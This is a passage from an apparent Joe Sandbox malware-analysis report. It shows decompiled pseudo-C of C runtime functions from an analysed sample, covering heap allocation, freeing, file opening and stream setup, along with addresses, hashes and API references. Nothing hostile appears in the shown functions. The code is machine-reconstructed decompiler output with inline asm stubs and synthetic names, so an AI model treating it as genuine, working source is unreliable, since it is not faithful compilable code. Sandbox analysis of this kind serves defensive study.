						_t3 = E00403FD7(__ebx, _t17);
						if(_t3 != 0) {
							 *0x417e74 = _t3;
							_t14 = 0;
							 *0x417e68 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E00406FE2(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E00406FE2(_t17);
					return _t14;
				} else {
					return 0;
				}
			}







                                                                                            0x00403f8b
                                                                                            0x00403f91
                                                                                            0x00403f92
                                                                                            0x00403f97
                                                                                            0x00403f9c
                                                                                            0x00403fa0
                                                                                            0x00403fa8
                                                                                            0x00403fb0
                                                                                            0x00403fb7
                                                                                            0x00403fbc
                                                                                            0x00403fbe
                                                                                            0x00403fb2
                                                                                            0x00403fb2
                                                                                            0x00403fb2
                                                                                            0x00403fc5
                                                                                            0x00403fa2
                                                                                            0x00403fa2
                                                                                            0x00403fa2
                                                                                            0x00403fcc
                                                                                            0x00403fd6
                                                                                            0x00403f8d
                                                                                            0x00403f8f
                                                                                            0x00403f8f

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 31ed29b9fa6453843d24910ecbbfb78c58ab75029c70dc4c6165667efac96bf9
                                                                                            • Instruction ID: 08afbc2524650eeb3f44a14162f2e2a764dbebded23c5f8bda658a5ef3d38345
                                                                                            • Opcode Fuzzy Hash: 31ed29b9fa6453843d24910ecbbfb78c58ab75029c70dc4c6165667efac96bf9
                                                                                            • Instruction Fuzzy Hash: 1FE06C62D5D61345D2113B3E7D4566A2DAD4B8173AF21427BF420E62D0DF7C4E46805D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004034E7 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 261 4034e7-4034f3 262 4034f5-40350b call 40514f call 40506e 261->262 263 40350c-403521 call 405dba 261->263 268 403523 263->268 269 403526-40352c call 406ac6 263->269 268->269 273 403531-403540 269->273 274 403550-403559 273->274 275 403542 273->275 278 40355b-40356a 274->278 279 40356f-4035a2 274->279 276 403612-403617 275->276 277 403548-40354a 275->277 280 403666-40366a 276->280 277->274 277->276 278->280 281 4035a4-4035ae 279->281 282 4035f9-403605 279->282 285 4035b0-4035bc 281->285 286 4035d2-4035de 281->286 283 403607-40360c call 40514f 282->283 284 403619 282->284 283->276 289 40361c-403626 284->289 285->286 290 4035be-4035cd call 40382a 285->290 286->284 287 4035e0-4035f7 call 4039c3 286->287 287->289 293 403628-40362a 289->293 294 40362c-403632 289->294 290->280 298 403664 293->298 299 403634-403643 call 40366b 294->299 300 403645-403649 294->300 298->280 299->280 301 403660-403662 300->301 302 40364b-40365e call 40ede0 300->302 301->298 302->301
                                                                                            C-Code - Quality: 93%
                                                                                            			E004034E7(signed int __edx, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				signed char _t61;
				signed int _t63;
				signed char _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				intOrPtr _t78;
				signed int _t86;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t116;

				_t97 = __edx;
				_t119 = _a4;
				if(_a4 != 0) {
					_t58 = E00405DBA(_a4);
					_t90 = _a4;
					_t106 = _t58;
					__eflags =  *(_t90 + 8);
					if( *(_t90 + 8) < 0) {
						 *(_t90 + 8) = 0;
					}
					_t59 = E00406AC6(_t106, 0, 0, 1); // executed
					_t91 = _t97;
					_t116 = _t115 + 0x10;
					_v12 = _t91;
					_t111 = _t59;
					_v24 = _t111;
					__eflags = _t91;
					if(__eflags > 0) {
						L7:
						_t61 =  *(_a4 + 0xc);
						__eflags = _t61 & 0x000000c0;
						if((_t61 & 0x000000c0) != 0) {
							_t63 = _t106 >> 6;
							_t92 = (_t106 & 0x0000003f) * 0x38;
							_v16 = _t63;
							_v20 = _t92;
							_t93 = _a4;
							_v8 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(0x417ed8 + _t63 * 4)) + 0x29));
							_t94 =  *(_t93 + 0xc);
							asm("cdq");
							_t108 =  *_t93 -  *((intOrPtr*)(_t93 + 4));
							_t86 = _t97;
							__eflags = _t94 & 0x00000003;
							if((_t94 & 0x00000003) == 0) {
								__eflags =  *(_a4 + 0xc) >> 0x00000002 & 0x00000001;
								if(__eflags != 0) {
									goto L18;
								} else {
									_t59 = E0040514F(__eflags);
									 *_t59 = 0x16;
									goto L17;
								}
							} else {
								__eflags = _v8 - 1;
								_t96 = _v16;
								_t102 = _v20;
								if(_v8 != 1) {
									L13:
									_t76 =  *((intOrPtr*)(0x417ed8 + _t96 * 4));
									__eflags =  *((char*)(_t102 + _t76 + 0x28));
									if( *((char*)(_t102 + _t76 + 0x28)) >= 0) {
										L18:
										_t112 = _a4;
									} else {
										_t112 = _a4;
										_t77 = E004039C3( *((intOrPtr*)(_t112 + 4)),  *_t112, _v8);
										_t116 = _t116 + 0xc;
										_t108 = _t108 + _t77;
										asm("adc ebx, edx");
									}
									_t95 = _v24;
									_t98 = _v12;
									__eflags = _t95 | _t98;
									if((_t95 | _t98) != 0) {
										_t73 =  *(_t112 + 0xc);
										__eflags = _t73 & 0x00000001;
										if((_t73 & 0x00000001) == 0) {
											__eflags = _v8 - 1;
											if(_v8 == 1) {
												_t75 = E0040EDE0(_t108, _t86, 2, 0);
												_t95 = _v24;
												_t108 = _t75;
											}
											_t108 = _t108 + _t95;
											asm("adc edx, ebx");
											goto L26;
										} else {
											_t74 = E0040366B(_a4, _t95, _t98, _t108, _t86);
										}
									} else {
										L26:
										_t74 = _t108;
									}
								} else {
									_t78 =  *((intOrPtr*)(0x417ed8 + _t96 * 4));
									__eflags =  *(_t102 + _t78 + 0x2d) & 0x00000002;
									if(( *(_t102 + _t78 + 0x2d) & 0x00000002) == 0) {
										goto L13;
									} else {
										_t74 = E0040382A(_t108, _t111, _a4, _t111, _v12);
									}
								}
							}
						} else {
							asm("cdq");
							_t74 = _t111 -  *((intOrPtr*)(_a4 + 8));
							asm("sbb ecx, edx");
						}
					} else {
						if(__eflags < 0) {
							L17:
							_t74 = _t59 | 0xffffffff;
						} else {
							__eflags = _t111;
							if(_t111 < 0) {
								goto L17;
							} else {
								goto L7;
							}
						}
					}
					return _t74;
				} else {
					 *((intOrPtr*)(E0040514F(_t119))) = 0x16;
					return E0040506E() | 0xffffffff;
				}
			}




































                                                                                            0x004034e7
                                                                                            0x004034ef
                                                                                            0x004034f3
                                                                                            0x00403511
                                                                                            0x00403517
                                                                                            0x0040351c
                                                                                            0x0040351e
                                                                                            0x00403521
                                                                                            0x00403523
                                                                                            0x00403523
                                                                                            0x0040352c
                                                                                            0x00403531
                                                                                            0x00403533
                                                                                            0x00403536
                                                                                            0x00403539
                                                                                            0x0040353b
                                                                                            0x0040353e
                                                                                            0x00403540
                                                                                            0x00403550
                                                                                            0x00403553
                                                                                            0x00403557
                                                                                            0x00403559
                                                                                            0x00403574
                                                                                            0x00403577
                                                                                            0x0040357a
                                                                                            0x00403584
                                                                                            0x0040358b
                                                                                            0x0040358e
                                                                                            0x00403596
                                                                                            0x00403599
                                                                                            0x0040359a
                                                                                            0x0040359c
                                                                                            0x0040359f
                                                                                            0x004035a2
                                                                                            0x00403603
                                                                                            0x00403605
                                                                                            0x00000000
                                                                                            0x00403607
                                                                                            0x00403607
                                                                                            0x0040360c
                                                                                            0x00000000
                                                                                            0x0040360c
                                                                                            0x004035a4
                                                                                            0x004035a4
                                                                                            0x004035a8
                                                                                            0x004035ab
                                                                                            0x004035ae
                                                                                            0x004035d2
                                                                                            0x004035d2
                                                                                            0x004035d9
                                                                                            0x004035de
                                                                                            0x00403619
                                                                                            0x00403619
                                                                                            0x004035e0
                                                                                            0x004035e0
                                                                                            0x004035eb
                                                                                            0x004035f0
                                                                                            0x004035f3
                                                                                            0x004035f5
                                                                                            0x004035f5
                                                                                            0x0040361c
                                                                                            0x00403621
                                                                                            0x00403624
                                                                                            0x00403626
                                                                                            0x0040362c
                                                                                            0x00403630
                                                                                            0x00403632
                                                                                            0x00403645
                                                                                            0x00403649
                                                                                            0x00403651
                                                                                            0x00403656
                                                                                            0x0040365e
                                                                                            0x0040365e
                                                                                            0x00403660
                                                                                            0x00403662
                                                                                            0x00000000
                                                                                            0x00403634
                                                                                            0x0040363b
                                                                                            0x00403640
                                                                                            0x00403628
                                                                                            0x00403664
                                                                                            0x00403664
                                                                                            0x00403664
                                                                                            0x004035b0
                                                                                            0x004035b0
                                                                                            0x004035b7
                                                                                            0x004035bc
                                                                                            0x00000000
                                                                                            0x004035be
                                                                                            0x004035c5
                                                                                            0x004035ca
                                                                                            0x004035bc
                                                                                            0x004035ae
                                                                                            0x0040355b
                                                                                            0x00403561
                                                                                            0x00403564
                                                                                            0x00403566
                                                                                            0x00403568
                                                                                            0x00403542
                                                                                            0x00403542
                                                                                            0x00403612
                                                                                            0x00403612
                                                                                            0x00403548
                                                                                            0x00403548
                                                                                            0x0040354a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040354a
                                                                                            0x00403542
                                                                                            0x0040366a
                                                                                            0x004034f5
                                                                                            0x004034fa
                                                                                            0x0040350b
                                                                                            0x0040350b

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fa2de8c888299bc69f32f4d727794e679d95cf650741ab69ec4b0c534cef72e4
                                                                                            • Instruction ID: 56c9d5425b1257ec8a0d52aadacee10d7a7b793ed9ed49bf201bb892848d5fc3
                                                                                            • Opcode Fuzzy Hash: fa2de8c888299bc69f32f4d727794e679d95cf650741ab69ec4b0c534cef72e4
                                                                                            • Instruction Fuzzy Hash: F9410571A00104BFCB10DF28C841AAA7FAAEF85355F28857AF409AB391D736DE41CB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040592C Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 307 40592c-40594d 308 405991-405993 307->308 309 405995-405998 308->309 310 40594f-405953 308->310 311 40599b-40599f 309->311 312 405955-40595e 310->312 313 4059a7-4059ab call 406f85 310->313 315 405960-40596f call 405860 312->315 316 40598e 312->316 317 4059b0-4059c0 call 406fe2 313->317 322 405971-405979 315->322 316->308 317->309 323 4059c2-4059ec call 409718 call 405860 317->323 322->322 324 40597b-405985 322->324 326 4059a0-4059a5 323->326 324->326 327 405987-40598d call 405874 324->327 326->311 327->316
                                                                                            C-Code - Quality: 94%
                                                                                            			E0040592C(signed int* _a4) {
				intOrPtr _v8;
				void* _t16;
				signed int _t18;
				signed int* _t19;
				signed char _t26;
				unsigned int _t28;
				signed char _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t47;
				signed int _t48;
				signed int _t51;

				_t33 =  *0x417ec8; // 0x200
				_t47 =  *0x417ecc; // 0x7cd740
				_t48 = _t47 + 0xc;
				_t35 = _t48 + (_t33 + 0xfffffffd) * 4;
				_v8 = _t35;
				while(_t48 != _t35) {
					_t51 =  *_t48;
					__eflags = _t51;
					if(_t51 == 0) {
						_t16 = E00406F85(1, 0x38); // executed
						 *_t48 = _t16;
						E00406FE2(0);
						_t18 =  *_t48;
						__eflags = _t18;
						if(__eflags == 0) {
							break;
						} else {
							 *(_t18 + 0x10) =  *(_t18 + 0x10) | 0xffffffff;
							E00409718(__eflags,  *_t48 + 0x20, 0xfa0, 0);
							_t51 =  *_t48;
							asm("lock or [eax], ecx");
							E00405860(_t51);
							goto L11;
						}
					} else {
						_t26 =  *(_t51 + 0xc) >> 0xd;
						__eflags = _t26 & 0x00000001;
						if((_t26 & 0x00000001) != 0) {
							L7:
							_t48 = _t48 + 4;
							__eflags = _t48;
							continue;
						} else {
							E00405860(_t51);
							_t28 =  *(_t51 + 0xc);
							do {
								__eflags = _t28 | 0x00002000;
								asm("lock cmpxchg [edx], ecx");
							} while ((_t28 | 0x00002000) != 0);
							_t35 = _v8;
							_t30 =  !(_t28 >> 0xd);
							__eflags = _t30 & 0x00000001;
							if((_t30 & 0x00000001) != 0) {
								L11:
								_t19 = _a4;
								 *_t19 = _t51;
							} else {
								E00405874(_t51);
								goto L7;
							}
						}
					}
					L10:
					return _t19;
				}
				_t19 = _a4;
				 *_t19 =  *_t19 & 0x00000000;
				goto L10;
			}















                                                                                            0x00405933
                                                                                            0x0040593b
                                                                                            0x00405941
                                                                                            0x00405947
                                                                                            0x0040594a
                                                                                            0x00405991
                                                                                            0x0040594f
                                                                                            0x00405951
                                                                                            0x00405953
                                                                                            0x004059ab
                                                                                            0x004059b2
                                                                                            0x004059b4
                                                                                            0x004059b9
                                                                                            0x004059be
                                                                                            0x004059c0
                                                                                            0x00000000
                                                                                            0x004059c2
                                                                                            0x004059c2
                                                                                            0x004059d3
                                                                                            0x004059d8
                                                                                            0x004059e2
                                                                                            0x004059e6
                                                                                            0x00000000
                                                                                            0x004059eb
                                                                                            0x00405955
                                                                                            0x00405959
                                                                                            0x0040595c
                                                                                            0x0040595e
                                                                                            0x0040598e
                                                                                            0x0040598e
                                                                                            0x0040598e
                                                                                            0x00000000
                                                                                            0x00405960
                                                                                            0x00405961
                                                                                            0x0040596f
                                                                                            0x00405971
                                                                                            0x00405973
                                                                                            0x00405975
                                                                                            0x00405975
                                                                                            0x0040597b
                                                                                            0x00405981
                                                                                            0x00405983
                                                                                            0x00405985
                                                                                            0x004059a0
                                                                                            0x004059a0
                                                                                            0x004059a3
                                                                                            0x00405987
                                                                                            0x00405988
                                                                                            0x00000000
                                                                                            0x0040598d
                                                                                            0x00405985
                                                                                            0x0040595e
                                                                                            0x0040599b
                                                                                            0x0040599f
                                                                                            0x0040599f
                                                                                            0x00405995
                                                                                            0x00405998
                                                                                            0x00000000

                                                                                            APIs
                                                                                              • Part of subcall function 00406F85: RtlAllocateHeap.NTDLL(00000008,00401043,00000000,?,00405642,00000001,00000364,0000000B,000000FF,?,00405154,00402D9D,00415230,00000010,00402E4E,?), ref: 00406FC6
                                                                                            • _free.LIBCMT ref: 004059B4
                                                                                              • Part of subcall function 00406FE2: HeapFree.KERNEL32(00000000,00000000,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?), ref: 00406FF8
                                                                                              • Part of subcall function 00406FE2: GetLastError.KERNEL32(?,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?,?), ref: 0040700A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocateErrorFreeLast_free
                                                                                            • String ID:
                                                                                            • API String ID: 314386986-0
                                                                                            • Opcode ID: 92a41fcd13e8605495e46da6905bd04ab6cdfa67fa4bae6f5f0399909c71f7fd
                                                                                            • Instruction ID: 9f30e9f1899ed21d3712fdda93a4c2f3142421aa4608b22d1f855e40be692aba
                                                                                            • Opcode Fuzzy Hash: 92a41fcd13e8605495e46da6905bd04ab6cdfa67fa4bae6f5f0399909c71f7fd
                                                                                            • Instruction Fuzzy Hash: 7A21CF72600701DFDB119F19C881B9BB368EF45334F11013AE915AB3D1D778A901CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405C18 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 333 405c18-405c3e call 4059ee 336 405c40-405c52 call 40ab6f 333->336 337 405c97-405c9a 333->337 339 405c57-405c5c 336->339 339->337 340 405c5e-405c96 339->340
                                                                                            C-Code - Quality: 72%
                                                                                            			E00405C18(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E004059EE(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
					_t26 = E0040AB6F( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x417ed0 =  *0x417ed0 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}









                                                                                            0x00405c29
                                                                                            0x00405c35
                                                                                            0x00405c36
                                                                                            0x00405c37
                                                                                            0x00405c3e
                                                                                            0x00405c97
                                                                                            0x00405c9a
                                                                                            0x00405c40
                                                                                            0x00405c52
                                                                                            0x00405c5c
                                                                                            0x00000000
                                                                                            0x00405c5e
                                                                                            0x00405c61
                                                                                            0x00405c6d
                                                                                            0x00405c75
                                                                                            0x00405c7b
                                                                                            0x00405c81
                                                                                            0x00405c87
                                                                                            0x00405c8f
                                                                                            0x00405c96
                                                                                            0x00405c96
                                                                                            0x00405c5c

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wsopen_s
                                                                                            • String ID:
                                                                                            • API String ID: 3347428461-0
                                                                                            • Opcode ID: e7d440cae1d54a605d50f799b5cb3e8443d0b30e5c75ea5e66699e747b0f8c5c
                                                                                            • Instruction ID: 85a39beb01b39aa461e7f112075d9463ab0468679b0852ffab216a9fcdaf944c
                                                                                            • Opcode Fuzzy Hash: e7d440cae1d54a605d50f799b5cb3e8443d0b30e5c75ea5e66699e747b0f8c5c
                                                                                            • Instruction Fuzzy Hash: EE111571A0420AAFCB05DF58E94599B7BF9EF48304F0540AAF809EB351D674EA11CB69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004087E9 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 341 4087e9-4087f6 call 406f85 343 4087fb-408806 341->343 344 408808-40880a 343->344 345 40880c-408814 343->345 346 408857-408863 call 406fe2 344->346 345->346 347 408816-40881a 345->347 348 40881c-408851 call 409718 347->348 353 408853-408856 348->353 353->346
                                                                                            C-Code - Quality: 95%
                                                                                            			E004087E9(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00406F85(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00409718(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00406FE2(0);
				return _t35;
			}









                                                                                            0x004087ef
                                                                                            0x004087f6
                                                                                            0x004087fb
                                                                                            0x004087ff
                                                                                            0x00408806
                                                                                            0x0040880c
                                                                                            0x0040880c
                                                                                            0x00408812
                                                                                            0x00408814
                                                                                            0x00408817
                                                                                            0x00408817
                                                                                            0x0040881a
                                                                                            0x0040881c
                                                                                            0x00408822
                                                                                            0x00408826
                                                                                            0x0040882b
                                                                                            0x0040882f
                                                                                            0x00408831
                                                                                            0x00408834
                                                                                            0x0040883a
                                                                                            0x00408841
                                                                                            0x00408845
                                                                                            0x00408849
                                                                                            0x0040884c
                                                                                            0x0040884f
                                                                                            0x0040884f
                                                                                            0x00408853
                                                                                            0x00408856
                                                                                            0x00408808
                                                                                            0x00408808
                                                                                            0x00408808
                                                                                            0x00408858
                                                                                            0x00408863

                                                                                            APIs
                                                                                              • Part of subcall function 00406F85: RtlAllocateHeap.NTDLL(00000008,00401043,00000000,?,00405642,00000001,00000364,0000000B,000000FF,?,00405154,00402D9D,00415230,00000010,00402E4E,?), ref: 00406FC6
                                                                                            • _free.LIBCMT ref: 00408858
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 614378929-0
                                                                                            • Opcode ID: c0d3694361ec62640127938cf1f114b6fc04930b97a500c0c69cfefd77c6b97a
                                                                                            • Instruction ID: dbd55c831d665ef6b058bf97fca70223e95c158bba6eed1b546baea953947cb1
                                                                                            • Opcode Fuzzy Hash: c0d3694361ec62640127938cf1f114b6fc04930b97a500c0c69cfefd77c6b97a
                                                                                            • Instruction Fuzzy Hash: B30149736043166BC320AF59D88199AFB98EB44370F55463EE585B76C0EB746C10CBA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406F85 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 354 406f85-406f90 355 406f92-406f9c 354->355 356 406f9e-406fa4 354->356 355->356 357 406fd2-406fdd call 40514f 355->357 358 406fa6-406fa7 356->358 359 406fbd-406fce RtlAllocateHeap 356->359 364 406fdf-406fe1 357->364 358->359 360 406fd0 359->360 361 406fa9-406fb0 call 4047d5 359->361 360->364 361->357 367 406fb2-406fbb call 409982 361->367 367->357 367->359
                                                                                            C-Code - Quality: 100%
                                                                                            			E00406F85(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x418328, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E004047D5();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0040514F(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00409982(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}







                                                                                            0x00406f8b
                                                                                            0x00406f90
                                                                                            0x00406f9e
                                                                                            0x00406f9e
                                                                                            0x00406fa4
                                                                                            0x00406fa6
                                                                                            0x00406fa6
                                                                                            0x00406fbd
                                                                                            0x00406fc6
                                                                                            0x00406fce
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406fae
                                                                                            0x00406fb0
                                                                                            0x00406fd2
                                                                                            0x00406fd7
                                                                                            0x00406fdd
                                                                                            0x00000000
                                                                                            0x00406fdd
                                                                                            0x00406fb9
                                                                                            0x00406fbb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406fbb
                                                                                            0x00000000
                                                                                            0x00406fbd
                                                                                            0x00406f96
                                                                                            0x00406f9c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,00401043,00000000,?,00405642,00000001,00000364,0000000B,000000FF,?,00405154,00402D9D,00415230,00000010,00402E4E,?), ref: 00406FC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: b6a6734c4bed297a4dd1626f1397741ce6cd1dfdd6d0e7d5a14c269226c8caa1
                                                                                            • Instruction ID: 80cbccdbaa46a2fa805e1cf40ec65710921b40ea819fd67c4599baa5b2787cb7
                                                                                            • Opcode Fuzzy Hash: b6a6734c4bed297a4dd1626f1397741ce6cd1dfdd6d0e7d5a14c269226c8caa1
                                                                                            • Instruction Fuzzy Hash: 7BF0243160423666DB205E22BC00B5B774AAF41770B168037FC06B72C0CB38EC3186ED
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040A848 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 370 40a848-40a86c CreateFileW
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040A848(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                                                                                            0x0040a865
                                                                                            0x0040a86c

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,0040AC38,?,?,00000000,?,0040AC38,00000000,0000000C), ref: 0040A865
                                                                                            Memory Dump Source
